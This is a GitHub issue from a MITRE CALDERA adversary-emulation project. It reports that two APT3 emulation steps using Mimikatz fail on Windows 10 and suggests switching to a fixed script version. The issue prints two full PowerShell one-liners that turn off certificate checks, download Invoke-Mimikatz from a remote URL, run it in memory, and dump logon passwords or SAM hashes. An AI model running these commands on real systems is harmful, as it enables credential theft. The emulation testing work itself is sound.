[Plugin Phases 14 & 15 ] 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) - Mimikatz Update
Cyb3rWard0g opened this issue · comments
Good evening team,
This issue goes along with:
because they are from the same setup and operation execution (APT3 - Full)
When I got to steps 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) , Mimikatz failed to run.
Script step 5.A.1 : https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml
Output:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function logonpasswords{ Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit"};logonpasswords;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+ $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodCountCouldNotFindBest
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
and more...
Script step 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055): https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml
Output:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function hashdump{ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"};hashdump;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+ $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodCountCouldNotFindBest
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
and more..
I was doing some reading and also remembered seeing something similar when playing with Empire (master branch). I remember switching to DEV branch and it worked properly with WIn10. Remember I am using The Shire Mordor Environment and my workstations are Win10 and Servers are Win 2019. They are all configured to the setup standards from the evals.
I also saw this issue in the Caldera repo which confirmed what I was thinking when I saw those initial error messages: mitre/caldera#38
I confirmed that Mimikatz in Empire Master branch does not have that fix applied. However, DEV branch does have it. I believe the following needs to be updated then:
I can submit a PR too, but I wanted to first check with you guys. I will give it a try with those two fixes soon.
Thank you in advance!
This was updated with the latest Mimikatz release: https://raw.githubusercontent.com/hunters-forge/Blacksmith/master/aws/mordor/cfn-files/scripts/Invoke-Mimikatz.ps1
UPDATED $PEBytes64 strings - 2.2.0-20190813 Release - Updated 10/20/2019